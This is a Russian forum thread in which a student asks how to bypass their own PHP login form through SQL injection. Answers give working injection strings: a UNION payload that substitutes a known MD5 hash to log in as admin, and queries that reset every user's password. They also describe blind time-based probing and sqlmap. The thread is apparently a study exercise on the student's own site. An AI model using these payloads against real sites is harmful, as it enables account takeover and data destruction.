# SQL инъекция формы на сайте

Tags: php, mysql, sql, веб-программирование, безопасность

Всем привет, получил задание написать простую форму регистрации и авторизации на сайте,успешно справился, теперь нужно зайти на сайт зная только логин, но не зная пароля с помощь SQL-инъекции. Как это сделать не могу понять, уже все статьи и туториалы пересмотрел, ищу помощи здесь
Вот код, проверяющий правильность введеного логина и пароля

```
    <?php
    session_start();
    ?>
<!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
        <link rel="stylesheet" href="style1.css">
    </head>
    <body>
    <div class="form-wrap">
        <h2 class="header-title" >Главная страница</h2>
    <form action="index.php" method="post" class="forma">
   <?
    //  вся процедура работает на сессиях. Именно в ней хранятся данные  пользователя, пока он находится на сайте. Очень важно запустить их в  самом начале странички!!!
    if (isset($_POST['login'])) { 
        $login = $_POST['login']; 
        if ($login == '') { 
            unset($login);
        } 
    } //заносим введенный пользователем логин в переменную $login, если он пустой, то уничтожаем переменную
    if (isset($_POST['password'])) { 
        $password=$_POST['password']; 
        if ($password ==''){ 
            unset($password);
        }
     }
    //заносим введенный пользователем пароль в переменную $password, если он пустой, то уничтожаем переменную
    if (empty($login) or empty($password))//если пользователь не ввел логин или пароль, то выдаем ошибку и останавливаем скрипт
    {   
        echo ("Вы ввели не всю информацию, вернитесь назад и заполните все поля!");?>
        <input type="submit" name="close" value="Назад" class="btn">
        <?
        exit ();
    }
    //если логин и пароль введены,то обрабатываем их, чтобы теги и скрипты не работали, мало ли что люди могут ввести
    $login = stripslashes($login);
    $login = htmlspecialchars($login);
    $password = stripslashes($password);
    $password = htmlspecialchars($password);
    //удаляем лишние пробелы
    $login = trim($login);
    $password = trim($password);
    // подключаемся к базе
    include ("bd.php");// файл bd.php должен быть в той же папке, что и все остальные, если это не так, то просто измените путь 
    $privilage = mysqli_query($db, "SELECT privilage FROM user WHERE login='$login'");
    $priv = mysqli_fetch_array($privilage);
    $result = mysqli_query($db, "SELECT * FROM user WHERE login='$login'");
    //извлекаем из базы все данные о пользователе с введенным логином
    $myrow = mysqli_fetch_array($result);

        $password = md5($password ."sdf");
        //если существует, то сверяем пароли
        if ($myrow['password']==$password) {
            //если пароли совпадают, то запускаем пользователю сессию! Можете его поздравить, он вошел!
            $_SESSION['login']=$myrow['login'];
            $_SESSION['id']=$myrow['id'];
           //эти данные очень часто используются, вот их и будет "носить с собой" вошедший пользователь
           if ($priv['privilage'] != NULL){
               ?>
               <div class="login">
               <?
               echo "Вы зашли как <br>";
               echo "администратор ".$_SESSION['login']." ";
               ?>
               </div>
               <? 
           }
            else{
               ?>
               <div class="login">
               <?
               echo "Вы вошли как <br>";
               echo "".$_SESSION['login'].""; 
               ?>
               </div> 
               <?
            }
        }
        else {
            //если пароли не сошлись
            echo ("Извините, введённый вами логин или пароль неверный.");
            ?>
            <input type="submit" name="close" value="Назад" class="btn">
            <?
            exit();
        }
    ?>      
        <input type="submit" name="close" value="Выйти" class="btn">
       </form>
    </div>
    </body>
    </html>
```

Comment: Попробуйте вместо логина ввести `'( update user set password = md5('123sdf')'` и после этого зайти с паролем 123 =)
Кстати войти на этот "сайт" можно незная ни логина ни пароля

Comment: Две ошибки вылезло
: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in
D:\Programms\OpenServer\OSPanel\domains\Form\testreg.php
on line
49


Warning
: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in
D:\Programms\OpenServer\OSPanel\domains\Form\testreg.php
on line
52

Comment: Обновите комментарий, я слгека поправил "иньекцию", если не сработает в текущем виде - покажите какой sql запрос в итоге улетает в БД?

Comment: Ваш код вставлть без изменений в поле логина, а в поле пароля написать любое значение затем отправить форму, так?

Comment: Вот такой вариант в поле логина, без изменений, пароль - любой) `1' and login=( update user set password = md5('123sdf'))`
После попытки войти - пароль для **всех** пользователей станет 123

Comment: Ввел, появляются те же самые ошибки

Comment: Что в итоге в результирующем запросе находится?(а то может проблема не в инекции?)

Comment: Не знаю :D Как посмотреть?

Comment: `include ("bd.php"); echo "SELECT privilage FROM user WHERE login='$login'";`

Comment: Поле privilage по умолчанию имеет значение NULL, если оно имеет любое другое значение то пользователь получает права администратора. Сейчас у всех записей стоит NULL

Comment: Занес данные из запроса в переменную и вывел , все работает по умолчанию NULL, если изменить значение то выводит корректное измененное значение

Comment: @ВладимирКлыков а еще идеи у вас есть? Всегда интересно смотреть, когда у человека такой размах фантазии. Совершенно оторванной от реальности.

Comment: @Ипатьев полно =) создавайте чат - нагенерирую кучу идей, которые тестировать мне будет лень =) Если человек не может показать что у него в результате(не помню что именно фильтрует stripslashes) - то мне тоже лень смотреть что именно оно отфильтрует =), если убрать этот фильтр - запрос пролезет именно так как необходимо и выполнится, и даже сменит пароль =)

Comment: @ВладимирКлыков ничего не фильтрует, эта функция бесполезна. А вот запросы update почему-то в селектах не работают. какая досада. и даже на stripslashes не свалишь, что это она во всем виновата

Comment: @Ипатьев stripslashes убрал, те же самые ошибки

Comment: @ВладимирКлыков есть идеи, что можно попробовать сделать еще?

Comment: просто натрави на свою форму sqlmap и оно тебе само всё найдёт и опишет

Comment: @Lexx918 ты вопрос прочти, а потом SQL map предлагай.

Comment: @Ипатьев прочитал. всё ок. что не так?

Answer (score 5, accepted):

Авторизоваться в вашей форме можно даже не зная логина. Давайте разберёмся по порядку.

Первое, и главное, на что надо обратить внимание - явное наличие sql-inj в вашем коде. У вас есть попытка обезопасить данные попадающие в запрос:

```
$login = htmlspecialchars($login);
```

Но, если вы читали [документацию](https://www.php.net/manual/ru/function.htmlspecialchars), то знаете, что одинарные кавычки в этом случае останутся в своём исходном виде (см. **ENT_QUOTES**) и это позволит злоумышленнику внедрить свой код в запрос.

Второе, о чём следует сказать - пароль всё равно необходим, т.к. проверка на валидность введённых данных у вас производится не в запросе, а программно ниже:

```
$password = md5($password ."sdf");
//если существует, то сверяем пароли
if ($myrow['password']==$password) {
```

Никакая sql-inj напрямую не позволит обойти этот участок кода. Но! Его можно обойти косвенно. И для этого есть два варианта:

- либо мы получаем пароль из базы и работаем с этим материалом (т.е. нарушаем требование "не знать пароль")
- либо мы внедряем свой заранее известный пароль в процесс авторизации (мы тоже его знаем изначально, но я не думаю, что это нарушает условия задачи)

Пойдём по второму пути.

Но сначала надо сделать небольшое отступление. Т.к. нам придётся вклиниваться в запрос, а мы не знаем ни названия полей в этой таблице, ни их типов, ни даже их количества, которое скрывается за звёздочкой в селекте..

```
SELECT * FROM user ..
```

.. нам так или иначе придётся провести изыскания по этому поводу. Механизмов это сделать - множество. Конкретно в вашем случае можно использовать, например, внедрение утверждений в паре с бенчмарком и делать выводы на основе скорости ответа сервера. Выглядит это примерно так:

```
.. если(предположение, ничего_не_делаем, спим_10_секунд) ..
```

В качестве предположений могут быть такие как "вторая буква первого поля таблицы юзеров равна Ы". Теперь, если сервер ответил быстро - мы выяснили букву, иначе перебираем дальше.

Это только один из способов. Их множество. Знать и перебирать их все - тяжко. Но есть готовый продукт - [sqlmap](http://sqlmap.org/). Это утилита, которая сама находит на вашей форме поля, пытается отправить форму на сервер, перебирает известные типы уязвимостей, а затем, эксплуатируя их, может просто скачать хоть всю базу на локальную машину злоумышленника. Дальше ему будет достаточно изучить её и уже на основе этих знаний пытаться проникнуть в систему.

Будем считать, что мы уже сделали всё перечисленное выше и уже знаем как минимум названия всех полей в таблице пользователей и хэш пароля администратора. Тут надо сделать ещё одну оговорку: из вашего вопроса мы уже знаем и хэш-функцию и соль, которая в ней применяется. Ниже я буду продолжать взлом основываясь на этих данных. В реальности же скорее всего придётся подбирать пароль и делать выводы о наличии соли на основе результата. Есть огромная вероятность, что реальный злоумышленник никогда ничего подобрать и не сможет (чёрт возьми, да сделай же соль побольше! и почитай, например, про [радужные таблицы](https://ru.wikipedia.org/wiki/%D0%A0%D0%B0%D0%B4%D1%83%D0%B6%D0%BD%D0%B0%D1%8F_%D1%82%D0%B0%D0%B1%D0%BB%D0%B8%D1%86%D0%B0)).

Пропустим рутину и просто сделаем небольшой прототип для продолжения на нём. Для этого я создал вот такую базу с одной таблицей и одной записью в ней:

```
create database test;
use test;
create table users(id int, password char(32), login char(10));
insert into users(1, "ae4b57dd10695a75861221d2204dd032", "admin");
```

Хэш `ae4b57dd10695a75861221d2204dd032` получается при пароле `123`. Я его получил выполнив `md5("123sdf")`.

Пробовать авторизоваться будем с паролем `456`:

```
md5("456sdf") = 1a1e6f3748226c314baef0532d0f8b1c
```

Дело за малым - таким образом модифицировать запрос, чтобы вместо оригинального хэша от пароля 123 запрос вернул бы наш хэш от пароля 456. Сделать это не сложно, запрос примитивный:

```
SELECT *
FROM users
WHERE login=''
union
select 0 as id, '1a1e6f3748226c314baef0532d0f8b1c' as password, 'admin' as login
from dual
where '1'
```

Внедряемая подстрока между одинарными кавычками - самой первой и самой последней, а именно:

```
'
union
select 0 as id, '1a1e6f3748226c314baef0532d0f8b1c' as password, 'admin' as login
from dual
where '1
```

Осталось записать её в одну строку и подставить в качестве логина в вашу форму. Пароль при этом значения не имеет:

```
' union select 0 as id, '1a1e6f3748226c314baef0532d0f8b1c' as password, 'admin' as login from dual where '1
```

И, вуаля! Мы авторизовались админом.

Comment: для отладки использовал урезанную (но с оригинальной логикой) версию в макете, который можно развернуть локально по инструкции https://gist.github.com/Lexx918/db1c0a8f3e0bf70b13dbce58ed276961

Answer (score 0):

Хм, не особо

> трудоемко

, но с часок пришлось убить и табличку естессена. 
Следующее будет работать на ура, не перестарайся, хацкер;)

```
$login = "-1' UNION SELECT id,login,password,email,wallet,token,status,access FROM users WHERE '1";
```

Если не имеешь представления об остальных полях в таблице, можно заменить чем угодно (login, password, 3, 4, 5, 6, 7), важно подобрать количество.

---

```
    $login = "-1' UNION SELECT id,login,password,email,wallet,token,status,access FROM 
             users WHERE '1";

    $login = htmlspecialchars (stripslashes ($login));

    try {
        $result = $this->model->queryy ("SELECT * FROM users WHERE login = '$login'");
    }
    catch (\PDOException $e) {
        echo $e->getMessage ().'<br>';
    }

    var_dump ($login);
    var_dump ($result);
```

---

Такое делать не стоит, но если задание, то можно и пароли потереть, чекай:

```
$login = "-1'; UPDATE users SET password=0 WHERE '1";
```

Comment: Как у многих новичков, у тебя трудности с пониманием задачи. Садись, два

Comment: В данном случае, дать утвердительный ответ, как авторизоваться совершенно не зная пароля либо схемы таблицы - нельзя. Я привел инъекцию, которой можно обойти проверки данной формы, остальное, за автором.
@Ипатьев Сильно громкие слова, для человека, который не предложил решения или же, для гуру, который оставил подобный комментарий оному новичку в одну строку без пояснения.

Comment: Можно, но, как я и говорил - трудоёмко. Инъекция в коде есть, и ее использование - вопрос только потраченных усилий. Но хорошо что ты хотя бы признал свою ошибку. Большинство на твоём месте стали бы только оправдываться. Но раз уж ты решил меня поучать, подумай теперь над своим ответом. То что ты воспринял задачу как испытание для себя, и прошел его - это хорошо. Но SO - не онлайн-тест и не форум где ты пишешь, смотрите какой я молодец - решил! Надо всё-таки учитывать контекст вопроса. А вопрос изначально бессмысленный. И нормальный ответ на него -  не надо ломать свою форму, надо защитить ее

Comment: Да, и твой второй запрос у автора не сработает. Mysqli, как и правильно настроенный пдо не выполняет по два запроса за раз

Answer (score -3):

Авторизация с помощью SQL инъекции здесь будет достаточно трудоемкая.
И непонятно, кто будет давать задание на эксплуатацию подобной инъекции тому, кто с трудом может накостылить примитивную "форму регистрации". А, главное, кому нужно её ломать.

В общем, если вопрос на самом деле звучит "Мне тут говорят что будет инъекция, докажите что это не так", то надо резко присмиреть и молча переписать этот ужас с использованием подготовленных выражений и нормального хэширования паролей.

Comment: Министерство образования, вот кто :)